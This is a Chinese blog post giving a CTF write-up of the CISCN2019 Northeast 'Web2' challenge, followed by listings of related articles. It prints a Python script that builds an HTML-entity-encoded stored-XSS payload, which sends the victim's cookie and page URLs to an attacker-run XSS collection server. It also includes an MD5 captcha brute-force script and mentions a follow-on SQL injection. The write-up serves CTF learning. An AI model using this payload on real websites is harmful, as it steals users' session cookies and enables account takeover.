[CISCN2019 华东北赛区]Web2

最新推荐文章于 2024-07-27 14:07:25 发布
最新推荐文章于 2024-07-27 14:07:25 发布
阅读量482 收藏 2
点赞数 4
文章标签: web安全 ctf 笔记 题解
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/137061272
版权
文章讲述了在CISCN2019华东北区比赛中的安全挑战,作者发现了一个XSS漏洞并尝试利用它获取管理员cookie,同时提到了使用自建平台的过程。后续尝试包括MD5哈希破解和SQL注入,但未能成功获取PHPSESSID。
摘要由CSDN通过智能技术生成

[CISCN2019 华东北赛区]Web2

  • 随便注册一个登录,发现
    image.png
  • 还有反馈页面,一看就知道大概率是xss,应该是为了得到管理员cookie
  • 扫描了一下,果然有admin.php后台登录
    image.png
  • buu可以连接访问外网了,所以内部的xss平台关闭了,使用自己搭建的莲花平台,不过需要一个服务器

自己搭建的xss平台使用

搭建

参考
https://blog.csdn.net/weixin_44652484/article/details/134169568
搭建非常简单

使用

image.png
根据其他人的题解
payload

xss='''(function(){window.location.href='http://ip/xss_platform/?location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''  
output = ""  
for c in xss:  
output += "&#" + str(ord(c))  
  
print("<svg><script>eval&#40&#34" + output + "&#34&#41</script>")
  • 然后提交文章,得到连接,来到反馈页面
    image.png
  • 说了要将域名改成web
    验证码
import hashlib
num=input()
for i in range(999999,10000000):
    m=hashlib.md5()
    m.update(str(i).encode())
    m=m.hexdigest()
    if m[:6]==num:
        print(i)
        break
  • 然后我得不到管理员的cookie啊,算了,反正思路是这样的,有没有大佬知道为什么的
  • 得到phpsessid之后登录,然后就是一个简单的sql注入
尘佑不尘
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"Double ciscn 2019 第十二届全国大学生信息安全竞赛"揭示了这是一个信息安全领域的竞赛,特别是针对大学生的。"全国大学生信息安全竞赛"是中国一项具有高影响力的年度赛事,旨在提升大学生的信息安全技能,...
东师范大学2019 839.docx
06-25
东师范大学2019年839计算机考研真题解析】 本次东师范大学计算机技术(085211)专业2019年的839科目考试涵盖了几大核心的计算机编程和算法相关知识点,主要包括数据结构、指针、递归、函数指针以及随机数生成...
BUUCTF-[CISCN2019 东北赛区]Web2
AndyNoel的博客
05-13 398
BUUCTF-[CISCN2019 东北赛区]Web2 看题 一个论坛,内容不错:) 可以投稿,点击投稿发现要注册,那就先注册登录。随便账号密码就行。 常规操作,扫一下站点,发现有admin.php,进行访问 思路 有session,可以确定一个思路,获取管理员的session得到权限,然后拿到flag 执行 去投稿,发现存在XSS漏洞,但是有一些过滤,''(''被转义成了"(",存在WAF,先转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新页面 使用
BUUCTF--[CISCN2019 东北赛区]Web2
qq_46263951的博客
07-25 419
进入之后我们看到的是一个blog页面, 随便注册一个账号进入 通过扫描目录发现admin.php,访问后给出以下提示 所以这里我们需要一个admin的cookie 再来看各个页面的作用 投稿:我们输入一段内容,然后会给出显示我们文章内容的链接,这里存在着存储型xss漏洞 反馈:通过提示我们可以知道我们提交反馈的链接admin用户会去访问,所以我们可以通过这里来获取的admin的cookie 大致流程:投稿处提交我们的xss代码--获取代码所在的链接--反馈给admin--获取cookie .
BUUCTF:[CISCN2019 东北赛区]Web2
末初的CSDN博客
03-31 2623
BUUCTF:[CISCN2019 东北赛区]Web2 参考:https://blog.csdn.net/weixin_44677409/article/details/100741998 经测试发现存在以下页面: index.php admin.php login.php register.php post.php commitbug.php about.php admin.php没有权限...
[CISCN2019 东南赛区]Web11
pakho_C的博客
08-02 601
smart是php的模板引擎,模板引擎的作用就是分离前端页面和数据的,题目中显示API的URL由于环境的原因无法使用,但我们的IP依旧显示在了页面的右上角,且根据它的提示XFF我们很容易想到,在X-Forwarded-For里构造sstipayload。Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,那么我们可以使用{php}{/php}标签来构造payload,但是本题会报错。每个{if}必须有一个配对的{/if}.也可以使用{else}和{elseif}....
BUUCTF:[CISCN2019 东南赛区]Web4
末初的CSDN博客
07-29 2138
题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E4%B8%9C%E5%8D%97%E8%B5%9B%E5%8C%BA]Web4 这种路由处理方式并不像是PHP,尝试了file:///etc/passwd没有效果,猜测Flask,尝试local_file:///读取文件 读取源码: import re, random, uuid, urllib from flask import Flask, session, request app
[CISCN2019 东南赛区]Web4
m0_62905261的博客
08-31 726
[CISCN2019 东南赛区]Web4
BUUCTF [CISCN2019 东南赛区] Web11
Senimo
12-23 644
BUUCTF [CISCN2019 东南赛区] Web11 考点: 根据页面提示,应该是一个类似IP查询的网站,根据**XXF(X-Forwarded-For)**判断
BUUCTF [CISCN2019 东南赛区]Web4
SanKobe的博客
05-24 284
注意这里有个坑,目标地址设备是用python2跑的,而我这里是python3,之前我一直用这个当SECRET_KEY,然后一直跑不出flag,百度了一下,python2和python3 random出来的位数是不一样的。最近打比赛遇到了flask_session伪造相关的题目,没学过,又碰巧随机挑了道BUUCTF的题目正好考的flask_session伪造,看完各位师傅的WP后,进行一次自我总结。百度了一下linux下设备网卡地址在/sys/class/net/eth0/address下。
BUUCTF [CISCN2019 东南赛区]Web11
qq_56313338的博客
08-15 158
X-Forwarded-For 是一个 HTTP 扩展头部,用来描述请求者的ip。如果后端认为这个是我们的真实ip并使用Smarty来回显那么就可能造成了SSTI。看到这个ip我们应该想到使用X-Forwarded-For字段。这里响应后你看到应该是空的,ctrl + u 查看源代码。时 IP会先为2,那么说明了此处就是有SSTI漏洞。上面可以看出这是Smarty模板引擎。
东师范大学2019计算机考研839试卷及答案(2019年839回忆版)
01-07
### 东师范大学2019计算机考研839试卷及答案解析 #### 一、问答题 **题目:**举例说明内部链接与外部链接的区别。 **知识点:** 1. **内部链接:**指的是网站内部页面之间的链接关系,即一个网页指向同一网站中...
东交通大学2013-2019年数据结构.pdf
10-25
东交通大学2013-2019年数据结构.pdf
第九届飞思卡尔摄像头赛区一等奖程序
08-24
在本项目中,参赛团队成功地获得了第九届飞思卡尔智能车竞赛赛区的一等奖,这是一个高度技术性的比赛,展示了团队在嵌入式系统设计和自动驾驶技术方面的卓越能力。主控芯片选择的是K60,这是一款由NXP(原...
网络安全自学从入门到精通的制胜攻略!!!
最新发布
2301_77160226的博客
07-27 239
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
OWASP ZAP:一款功能强大的开源Web安全扫描工具
Coder加油站的专栏
07-27 828
OWASP ZAP是一个功能强大的Web应用程序安全扫描工具,适用于各种开发、测试和生产环境。通过自动扫描、手动测试、被动扫描和主动扫描等多种功能,ZAP能够帮助用户全面评估Web应用程序的安全性。此外,ZAP还提供了强大的API、插件和扩展功能,可以与CI/CD流水线集成,自动化地进行安全测试
网络安全相关竞赛比赛
黑战士的博客
07-18 1283
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
dsp c6657 SYS/BIOS学习笔记
小pp的博客
07-25 222
SYS/BIOS是一种用于TI的DSP平台的嵌入式操作系统(RTOS)。
设计2015年cernet东北地区年会网站
06-28
设计2015年CERNET东北地区年会网站需要考虑以下几个方面: 1. 网站整体风格:应该与CERNET的品牌形象相符合,同时也要考虑到年会的主题和氛围,选择相应的色彩和设计元素。 2. 网站结构和功能:应该清晰明了,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值